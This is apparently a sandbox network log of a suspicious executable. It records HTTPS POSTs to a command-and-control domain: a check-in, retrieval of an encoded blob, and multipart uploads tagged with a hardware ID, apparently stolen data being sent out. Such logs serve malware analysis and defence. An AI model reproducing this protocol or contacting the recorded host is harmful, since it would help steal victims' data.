2025-01-02 19:16:38 UTC	490	IN	Data Raw: 72 20 41 67 72 65 65 6d 65 6e 74 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 26 6e 62 73 70 3b 7c 20 26 6e 62 73 70 3b 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 61 63 63 6f 75 6e 74 2f 63 6f 6f 6b 69 65 70 72 65 66 65 72 65 6e 63 65 73 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6f 6f 6b 69 65 73 3c 2f 61 3e 0a 09 09 09 09 09 09 3c 2f 73 70 61 6e 3e 0a 09 09 09 09 09 09 09 09 09 3c 2f 73 70 61 6e 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 65 73 70 6f 6e 73 69 76 65 5f 6f 70 74 69 6e 5f 6c 69 6e 6b 22 3e 0a 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 74 Data Ascii: r Agreement</a>  \|  <a href="http://store.steampowered.com/account/cookiepreferences/" target="_blank">Cookies</a></span></span></div><div class="responsive_optin_link"><div class="bt

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.7	49701	172.67.157.254	443	4048	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-02 19:16:38 UTC	262	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: lev-tolstoi.com
2025-01-02 19:16:38 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2025-01-02 19:16:39 UTC	1131	IN	HTTP/1.1 200 OK Date: Thu, 02 Jan 2025 19:16:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=vjo2io526m80tksledhfbddtab; expires=Mon, 28 Apr 2025 13:03:18 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=b%2FfEPn3uqn6HnwgQqEitG%2BLhv9ETZVS3z0S9%2B%2BH7faJkLrKfRky3n0DtxnEhZ3B%2FM5iAWF6K3jYTRLw%2F8qKaQpO0A%2FGM467ZcvQ2iBpHlMpq3Izkc3oRBcAEumrEOYvRXsc%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fbd15affc101885-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1563&min_rtt=1563&rtt_var=587&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2834&recv_bytes=906&delivery_rate=1864623&cwnd=193&unsent_bytes=0&cid=c989bf882e0b97de&ts=442&x=0"
2025-01-02 19:16:39 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2025-01-02 19:16:39 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.7	49702	172.67.157.254	443	4048	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-02 19:16:40 UTC	263	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 86 Host: lev-tolstoi.com
2025-01-02 19:16:40 UTC	86	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 48 70 4f 6f 49 68 2d 2d 32 61 37 32 37 61 30 33 32 63 34 64 26 6a 3d 62 39 61 62 63 37 36 63 65 35 33 62 36 66 63 33 61 30 33 35 36 36 66 38 66 37 36 34 66 35 65 61 Data Ascii: act=recive_message&ver=4.0&lid=HpOoIh--2a727a032c4d&j=b9abc76ce53b6fc3a03566f8f764f5ea
2025-01-02 19:16:40 UTC	1129	IN	HTTP/1.1 200 OK Date: Thu, 02 Jan 2025 19:16:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=pjr58d8gs271t9oua2t2a0idf8; expires=Mon, 28 Apr 2025 13:03:19 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3%2BCMKXA4QOyyG7f%2FpOqKhNdbhSmmQoj4jZlLaKDeSZIi8Q4scEtUnbYAZKRlHY%2B9ULJlXxgEXU%2BzCmvamIoOCVKN7MVk7DsKjYvj36gI7S1J%2BtzeZdxfXTRsrGWZ%2B2cPH84%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fbd15b6adc3c337-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1692&min_rtt=1686&rtt_var=644&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2835&recv_bytes=985&delivery_rate=1682997&cwnd=203&unsent_bytes=0&cid=c814efc7a39d665d&ts=470&x=0"
2025-01-02 19:16:40 UTC	240	IN	Data Raw: 34 33 30 63 0d 0a 50 51 36 35 73 31 55 47 79 48 76 66 49 71 63 45 43 42 72 4c 55 33 41 46 42 56 6d 46 4e 48 7a 43 45 4a 76 2b 39 52 34 30 78 4d 78 47 4c 4d 2b 52 62 7a 4c 6b 57 61 78 48 68 54 35 75 65 36 63 67 46 53 6b 6e 4f 4f 45 57 52 71 52 78 39 34 32 51 4d 68 61 79 6f 52 38 30 33 39 49 35 64 61 31 58 2f 55 66 66 4a 6a 4a 42 73 48 45 56 61 79 64 6a 70 31 45 57 6f 48 48 33 6e 4a 52 31 57 37 53 67 58 6d 62 56 31 44 31 6a 71 78 2b 2b 54 73 70 68 62 58 2b 71 4f 52 35 73 61 44 48 6f 46 6c 44 67 64 65 48 63 7a 7a 78 35 6f 62 68 63 51 39 6a 41 50 69 53 31 56 36 51 41 77 6d 6f 71 49 4f 6b 79 46 57 64 70 50 2b 46 66 46 4b 70 34 2f 35 32 52 64 45 53 74 71 6c 56 6d 32 39 63 38 61 61 49 4c 73 30 54 4e 61 6d 74 31 71 6e Data Ascii: 430cPQ65s1UGyHvfIqcECBrLU3AFBVmFNHzCEJv+9R40xMxGLM+RbzLkWaxHhT5ue6cgFSknOOEWRqRx942QMhayoR8039I5da1X/UffJjJBsHEVaydjp1EWoHH3nJR1W7SgXmbV1D1jqx++TsphbX+qOR5saDHoFlDgdeHczzx5obhcQ9jAPiS1V6QAwmoqIOkyFWdpP+FfFKp4/52RdEStqlVm29c8aaILs0TNamt1qn
2025-01-02 19:16:40 UTC	1369	IN	Data Raw: 46 63 4a 32 41 6a 70 77 35 65 38 30 44 36 6a 59 5a 70 57 37 61 6f 48 33 4f 56 79 48 64 6a 70 6c 6e 6c 41 4d 31 71 5a 48 32 71 50 68 56 6d 5a 79 6e 6f 56 68 32 6f 65 76 32 57 6d 48 4e 5a 71 4b 52 59 5a 4e 4c 57 4f 47 4f 69 48 37 4a 44 68 53 67 71 66 37 46 78 53 69 64 48 4b 2b 52 56 43 71 31 6a 75 59 50 5a 5a 52 61 68 6f 68 38 30 6d 39 63 35 5a 61 63 5a 72 30 6a 4f 62 57 39 71 6f 6a 67 66 61 6d 63 32 37 56 6b 64 6f 48 58 7a 6c 70 68 32 55 71 75 6a 57 57 7a 62 6b 58 6b 6b 72 51 48 39 47 49 56 46 62 32 69 75 50 51 51 6c 58 58 76 34 47 41 66 67 64 66 58 63 7a 7a 78 65 6f 36 31 63 5a 39 54 53 50 32 2b 34 47 61 39 47 79 47 4e 34 66 71 77 2f 47 47 52 31 4d 65 6c 51 48 61 6c 35 38 4a 6d 51 65 42 62 6f 37 6c 68 30 6d 34 6c 33 52 61 63 53 73 55 72 53 5a 69 70 6e 35 Data Ascii: FcJ2Ajpw5e80D6jYZpW7aoH3OVyHdjplnlAM1qZH2qPhVmZynoVh2oev2WmHNZqKRYZNLWOGOiH7JDhSgqf7FxSidHK+RVCq1juYPZZRahoh80m9c5ZacZr0jObW9qojgfamc27VkdoHXzlph2UqujWWzbkXkkrQH9GIVFb2iuPQQlXXv4GAfgdfXczzxeo61cZ9TSP2+4Ga9GyGN4fqw/GGR1MelQHal58JmQeBbo7lh0m4l3RacSsUrSZipn5
2025-01-02 19:16:40 UTC	1369	IN	Data Raw: 74 4f 2b 39 54 48 36 70 34 75 64 4c 58 65 30 37 6d 39 68 39 64 7a 4e 70 31 55 61 6b 58 73 30 66 54 4a 6e 55 32 73 48 45 56 61 79 64 6a 70 31 73 57 70 58 66 32 6e 5a 31 79 55 36 79 69 56 32 4c 59 77 7a 68 67 71 68 57 31 53 73 68 6f 62 6e 43 67 4f 68 6c 68 5a 7a 72 74 46 6c 44 67 64 65 48 63 7a 7a 78 69 6f 61 4a 53 59 35 6e 6b 4e 47 71 6b 48 71 73 41 32 69 68 7a 4f 4b 34 39 55 6a 38 6e 4e 2b 35 57 46 61 70 32 2b 5a 75 61 65 56 57 68 72 56 4a 72 30 64 38 77 59 4b 59 51 73 45 62 46 59 57 35 39 75 7a 51 62 61 32 74 37 71 52 59 5a 75 44 4b 68 33 4c 68 37 51 4b 57 42 58 48 33 53 6b 53 67 71 73 31 6d 36 54 49 55 2b 4b 6e 2b 73 4f 52 6c 68 62 7a 76 31 55 78 43 72 63 2f 4f 61 6c 6e 46 61 6f 4b 35 65 62 4e 33 64 4e 32 4f 74 43 36 39 46 77 33 52 67 4f 4f 64 78 46 58 Data Ascii: tO+9TH6p4udLXe07m9h9dzNp1UakXs0fTJnU2sHEVaydjp1sWpXf2nZ1yU6yiV2LYwzhgqhW1SshobnCgOhlhZzrtFlDgdeHczzxioaJSY5nkNGqkHqsA2ihzOK49Uj8nN+5WFap2+ZuaeVWhrVJr0d8wYKYQsEbFYW59uzQba2t7qRYZuDKh3Lh7QKWBXH3SkSgqs1m6TIU+Kn+sORlhbzv1UxCrc/OalnFaoK5ebN3dN2OtC69Fw3RgOOdxFX
2025-01-02 19:16:40 UTC	1369	IN	Data Raw: 55 52 4c 67 4b 72 6d 66 6d 48 56 5a 72 71 5a 51 59 39 2f 66 4d 57 4b 6e 48 4c 4a 4b 31 32 35 6b 64 61 49 2b 47 58 56 6e 4e 75 4e 61 47 71 68 35 38 39 7a 5a 50 46 47 2b 37 67 63 73 37 74 77 34 5a 4b 6b 50 2f 56 2b 4c 66 79 70 2f 70 58 46 4b 4a 32 73 31 35 31 6b 53 72 48 6e 78 6e 5a 74 79 55 61 4f 6e 56 32 54 4a 30 44 4e 73 71 78 65 79 51 63 46 6a 62 33 79 75 4e 52 52 6f 4a 33 57 6e 55 51 62 67 4b 72 6d 7a 73 45 6b 55 68 35 51 66 63 35 58 49 64 32 4f 6d 57 65 55 41 79 57 56 6d 63 4b 59 33 47 32 74 74 4d 75 78 61 46 61 52 2b 38 4a 6d 52 66 56 4f 6a 72 31 74 67 30 64 63 30 5a 36 55 57 73 6b 69 46 4b 43 70 2f 73 58 46 4b 4a 30 49 73 37 46 67 59 34 47 32 33 68 64 64 37 57 75 62 32 48 32 44 53 31 7a 46 68 70 68 69 37 53 4d 42 75 62 6e 6d 76 4e 78 46 6f 59 7a 37 Data Ascii: URLgKrmfmHVZrqZQY9/fMWKnHLJK125kdaI+GXVnNuNaGqh589zZPFG+7gcs7tw4ZKkP/V+Lfyp/pXFKJ2s151kSrHnxnZtyUaOnV2TJ0DNsqxeyQcFjb3yuNRRoJ3WnUQbgKrmzsEkUh5Qfc5XId2OmWeUAyWVmcKY3G2ttMuxaFaR+8JmRfVOjr1tg0dc0Z6UWskiFKCp/sXFKJ0Is7FgY4G23hdd7Wub2H2DS1zFhphi7SMBubnmvNxFoYz7
2025-01-02 19:16:40 UTC	1369	IN	Data Raw: 33 7a 32 6e 34 56 39 57 36 32 38 57 47 50 66 31 6a 74 69 70 52 2b 38 52 63 39 71 62 58 32 69 50 68 34 6e 4b 58 76 67 54 6c 37 34 4d 74 65 58 68 47 74 56 71 4b 56 4a 64 35 76 4f 65 58 33 71 48 72 45 41 6e 53 5a 70 63 36 49 31 45 6d 74 6e 50 2b 70 57 44 4b 39 31 2f 70 57 63 62 6c 79 68 71 56 52 6b 30 4e 34 78 64 71 59 58 72 30 58 58 64 43 6f 32 36 54 59 4b 4a 7a 39 37 30 56 45 4f 73 48 47 37 72 59 46 2f 51 4b 32 6a 55 79 7a 45 6e 79 34 6b 72 52 58 39 47 49 56 67 5a 58 47 71 50 68 4e 75 61 7a 62 69 58 78 75 68 64 50 32 57 6e 58 78 51 6f 4b 39 61 5a 74 6a 51 50 57 32 74 45 62 70 44 31 79 59 6b 4f 4b 34 70 55 6a 38 6e 45 75 42 45 45 4c 41 79 35 74 4b 4f 50 46 47 71 37 67 63 73 33 39 73 34 59 4b 30 56 75 30 58 44 61 32 74 33 71 44 45 64 59 32 77 79 34 56 63 54 Data Ascii: 3z2n4V9W628WGPf1jtipR+8Rc9qbX2iPh4nKXvgTl74MteXhGtVqKVJd5vOeX3qHrEAnSZpc6I1EmtnP+pWDK91/pWcblyhqVRk0N4xdqYXr0XXdCo26TYKJz970VEOsHG7rYF/QK2jUyzEny4krRX9GIVgZXGqPhNuazbiXxuhdP2WnXxQoK9aZtjQPW2tEbpD1yYkOK4pUj8nEuBEELAy5tKOPFGq7gcs39s4YK0Vu0XDa2t3qDEdY2wy4VcT
2025-01-02 19:16:40 UTC	1369	IN	Data Raw: 58 58 65 31 72 6d 39 68 39 73 30 64 51 39 61 61 6b 57 76 6c 4c 45 59 48 68 34 70 44 73 41 62 57 77 2b 36 6c 73 54 6f 33 54 2f 6c 35 74 75 58 36 61 74 56 43 79 56 6b 54 42 38 36 6b 48 39 59 39 4a 77 59 48 2b 6c 4a 78 6c 6d 5a 43 33 71 52 6c 37 75 4d 75 69 62 68 6a 77 4f 73 4c 35 49 61 38 53 66 4c 69 53 74 46 66 30 59 68 57 42 6a 66 71 34 33 48 48 56 69 50 65 68 5a 46 36 6c 32 38 5a 2b 58 65 46 4b 68 71 31 78 67 30 4e 59 30 61 36 34 51 73 30 6e 4b 4a 69 51 34 72 69 6c 53 50 79 63 61 2f 46 55 53 72 54 4c 6d 30 6f 34 38 55 61 72 75 42 79 7a 58 33 7a 4a 6b 6f 42 2b 35 52 63 4e 73 62 33 69 69 4d 68 31 6a 59 54 2f 6f 56 68 57 70 63 2f 2b 5a 6e 58 64 51 71 36 31 5a 61 70 75 66 64 32 4f 79 57 65 55 41 35 58 31 6e 64 4b 35 78 44 53 6c 2b 65 2b 42 61 58 76 67 79 38 Data Ascii: XXe1rm9h9s0dQ9aakWvlLEYHh4pDsAbWw+6lsTo3T/l5tuX6atVCyVkTB86kH9Y9JwYH+lJxlmZC3qRl7uMuibhjwOsL5Ia8SfLiStFf0YhWBjfq43HHViPehZF6l28Z+XeFKhq1xg0NY0a64Qs0nKJiQ4rilSPyca/FUSrTLm0o48UaruByzX3zJkoB+5RcNsb3iiMh1jYT/oVhWpc/+ZnXdQq61Zapufd2OyWeUA5X1ndK5xDSl+e+BaXvgy8
2025-01-02 19:16:40 UTC	1369	IN	Data Raw: 5a 35 76 5a 6d 4c 4e 4c 57 4c 48 57 38 46 4b 31 48 68 56 6b 6b 4f 4c 46 78 53 69 64 53 4f 4f 6c 59 47 62 5a 6a 74 4c 75 42 64 6c 47 32 71 55 68 6a 6d 35 39 33 59 75 70 42 37 67 36 46 59 6e 73 34 38 57 46 41 50 44 4a 6f 73 41 5a 4d 76 7a 7a 67 33 49 45 38 44 76 54 67 48 33 36 62 69 58 63 6a 71 51 75 76 52 73 5a 77 61 54 2b 58 44 7a 56 39 61 6a 33 77 52 79 43 65 64 65 4f 52 6b 57 74 48 36 72 74 63 59 74 58 57 49 53 54 6b 57 62 49 41 6e 56 38 71 4d 4f 6b 4f 58 43 64 2f 65 37 38 57 4b 36 4e 38 39 35 75 42 62 52 75 42 74 46 4a 71 7a 4d 42 33 4b 75 6f 66 2f 52 69 56 4b 43 70 38 75 48 46 4b 4e 7a 56 67 73 67 56 4a 38 43 44 6d 30 6f 34 38 51 4f 62 32 44 53 4b 62 77 33 63 38 36 6c 36 2b 55 74 64 67 61 57 36 71 64 69 78 5a 53 54 7a 68 55 78 6d 77 4d 4e 65 58 67 33 Data Ascii: Z5vZmLNLWLHW8FK1HhVkkOLFxSidSOOlYGbZjtLuBdlG2qUhjm593YupB7g6FYns48WFAPDJosAZMvzzg3IE8DvTgH36biXcjqQuvRsZwaT+XDzV9aj3wRyCedeORkWtH6rtcYtXWISTkWbIAnV8qMOkOXCd/e78WK6N895uBbRuBtFJqzMB3Kuof/RiVKCp8uHFKNzVgsgVJ8CDm0o48QOb2DSKbw3c86l6+UtdgaW6qdixZSTzhUxmwMNeXg3
2025-01-02 19:16:40 UTC	1369	IN	Data Raw: 58 6e 72 4c 78 6a 67 6b 35 46 6d 37 41 4a 30 30 4a 44 69 74 49 46 49 2f 4e 32 6d 38 41 30 33 33 49 71 75 44 32 57 55 57 73 4f 34 48 50 70 57 52 4a 53 54 79 57 66 70 44 31 33 52 73 65 37 38 79 56 56 6c 5a 48 4f 6c 52 48 37 5a 69 37 70 50 59 55 6d 43 48 6b 47 46 35 32 4e 38 35 59 37 77 49 2f 51 36 46 61 53 6f 67 6b 48 46 61 4a 31 68 31 70 30 35 65 2b 44 4c 4d 6e 35 6c 79 55 62 43 2f 45 6b 76 56 31 6a 5a 79 75 67 36 79 44 2b 74 51 53 7a 6a 6e 63 52 51 6e 50 32 6d 70 46 68 71 78 4d 71 48 4d 78 53 63 44 39 66 6b 50 50 73 53 66 4c 69 53 38 57 65 55 53 69 79 5a 34 4f 50 46 78 56 57 52 31 4b 65 46 56 43 4b 4d 31 78 36 4b 77 63 6c 47 6e 75 45 39 68 31 2f 41 30 64 61 41 6e 67 31 58 47 61 47 52 2f 76 79 42 53 4b 53 63 30 70 77 34 6e 34 44 71 35 6f 39 6b 38 54 75 62 Data Ascii: XnrLxjgk5Fm7AJ00JDitIFI/N2m8A033IquD2WUWsO4HPpWRJSTyWfpD13Rse78yVVlZHOlRH7Zi7pPYUmCHkGF52N85Y7wI/Q6FaSogkHFaJ1h1p05e+DLMn5lyUbC/EkvV1jZyug6yD+tQSzjncRQnP2mpFhqxMqHMxScD9fkPPsSfLiS8WeUSiyZ4OPFxVWR1KeFVCKM1x6KwclGnuE9h1/A0daAng1XGaGR/vyBSKSc0pw4n4Dq5o9k8Tub
2025-01-02 19:16:40 UTC	1369	IN	Data Raw: 4a 4d 47 61 61 34 50 71 45 50 56 59 56 52 47 68 43 4d 56 64 32 52 35 79 31 45 54 72 45 7a 48 71 34 5a 37 52 75 53 49 58 48 72 59 6b 58 6b 6b 73 6c 6e 6c 41 4f 68 30 62 57 69 71 63 7a 35 67 61 6a 65 6e 53 56 43 35 4d 75 2f 63 7a 79 38 59 35 72 77 66 4e 4a 75 57 4e 48 61 34 48 37 35 57 78 69 46 55 52 6f 51 6a 46 58 64 6b 65 64 5a 62 47 72 5a 6e 2b 6f 79 51 51 6d 69 4c 76 46 68 38 32 4a 4d 53 58 75 67 6f 71 30 50 46 61 47 30 34 35 33 45 4b 4a 7a 39 37 79 6b 51 5a 73 48 47 37 75 61 30 2b 5a 37 43 74 58 32 4c 63 6b 58 6b 6b 70 6c 6e 6c 41 4d 68 30 62 57 69 71 66 52 56 39 59 48 76 34 47 41 66 67 5a 4c 6e 45 78 44 49 57 74 4f 34 48 4c 4a 7a 66 4f 6d 57 70 46 37 35 53 31 32 42 70 62 71 70 32 4c 46 6c 49 4d 4f 5a 47 45 37 46 2f 2f 59 71 70 51 6e 47 67 71 31 68 53 Data Ascii: JMGaa4PqEPVYVRGhCMVd2R5y1ETrEzHq4Z7RuSIXHrYkXkkslnlAOh0bWiqcz5gajenSVC5Mu/czy8Y5rwfNJuWNHa4H75WxiFURoQjFXdkedZbGrZn+oyQQmiLvFh82JMSXugoq0PFaG0453EKJz97ykQZsHG7ua0+Z7CtX2LckXkkplnlAMh0bWiqfRV9YHv4GAfgZLnExDIWtO4HLJzfOmWpF75S12Bpbqp2LFlIMOZGE7F//YqpQnGgq1hS

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.7	49703	172.67.157.254	443	4048	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-02 19:16:41 UTC	276	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=CRHWV3EVPVRBW User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 12821 Host: lev-tolstoi.com
2025-01-02 19:16:41 UTC	12821	OUT	Data Raw: 2d 2d 43 52 48 57 56 33 45 56 50 56 52 42 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 43 41 46 39 43 42 33 46 33 46 38 33 35 43 42 38 38 42 39 46 39 37 42 36 30 45 44 36 31 38 44 0d 0a 2d 2d 43 52 48 57 56 33 45 56 50 56 52 42 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 43 52 48 57 56 33 45 56 50 56 52 42 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 32 61 37 32 37 61 30 33 32 63 34 64 0d 0a 2d 2d 43 52 48 57 Data Ascii: --CRHWV3EVPVRBWContent-Disposition: form-data; name="hwid"1CAF9CB3F3F835CB88B9F97B60ED618D--CRHWV3EVPVRBWContent-Disposition: form-data; name="pid"2--CRHWV3EVPVRBWContent-Disposition: form-data; name="lid"HpOoIh--2a727a032c4d--CRHW
2025-01-02 19:16:41 UTC	1126	IN	HTTP/1.1 200 OK Date: Thu, 02 Jan 2025 19:16:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=s6rtjv438a29pafu8q21aqu3pi; expires=Mon, 28 Apr 2025 13:03:20 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NNT%2BCsTRuNKQUvAP1v925XZh1kObx4HeYJNFtdsZtBCcoYgr%2BDZrId8gSI6t%2F1snqmQD5h7aHAppjpsP0yPim2aOmy82ZflD9hhWKj32hV6AE10tDnKyQlrndT9Ylz5BRvk%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fbd15bd8ffa4358-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1634&min_rtt=1630&rtt_var=619&sent=8&recv=18&lost=0&retrans=0&sent_bytes=2836&recv_bytes=13755&delivery_rate=1754807&cwnd=206&unsent_bytes=0&cid=79e7343d66e5d9ee&ts=831&x=0"
2025-01-02 19:16:41 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2025-01-02 19:16:41 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.7	49704	172.67.157.254	443	4048	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-02 19:16:42 UTC	272	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=2YLYEFNEH User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 15029 Host: lev-tolstoi.com
2025-01-02 19:16:42 UTC	15029	OUT	Data Raw: 2d 2d 32 59 4c 59 45 46 4e 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 43 41 46 39 43 42 33 46 33 46 38 33 35 43 42 38 38 42 39 46 39 37 42 36 30 45 44 36 31 38 44 0d 0a 2d 2d 32 59 4c 59 45 46 4e 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 32 59 4c 59 45 46 4e 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 32 61 37 32 37 61 30 33 32 63 34 64 0d 0a 2d 2d 32 59 4c 59 45 46 4e 45 48 0d 0a 43 6f 6e 74 65 Data Ascii: --2YLYEFNEHContent-Disposition: form-data; name="hwid"1CAF9CB3F3F835CB88B9F97B60ED618D--2YLYEFNEHContent-Disposition: form-data; name="pid"2--2YLYEFNEHContent-Disposition: form-data; name="lid"HpOoIh--2a727a032c4d--2YLYEFNEHConte
2025-01-02 19:16:43 UTC	1127	IN	HTTP/1.1 200 OK Date: Thu, 02 Jan 2025 19:16:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=csvdstkbpktkpfuqebdlqumtj3; expires=Mon, 28 Apr 2025 13:03:22 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=I6lL0tEagcFLtflpayDBa2ogFWWE49cD0eLHDQGMyBzU7tXnd0RhDHHsfT6MXvUbfg2VR%2B%2FFpb06cf87HiZA1T5Xfgme%2BzNwDYwRsOIks7fm4qtfxU6RiOpDILJ6psqltis%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fbd15c688dc4302-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1744&min_rtt=1742&rtt_var=655&sent=10&recv=20&lost=0&retrans=0&sent_bytes=2835&recv_bytes=15959&delivery_rate=1676234&cwnd=252&unsent_bytes=0&cid=f27d71016f9b3414&ts=806&x=0"
2025-01-02 19:16:43 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2025-01-02 19:16:43 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.7	49705	172.67.157.254	443	4048	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-02 19:16:44 UTC	277	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=BN7PQMTTJNCXTF User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 20384 Host: lev-tolstoi.com
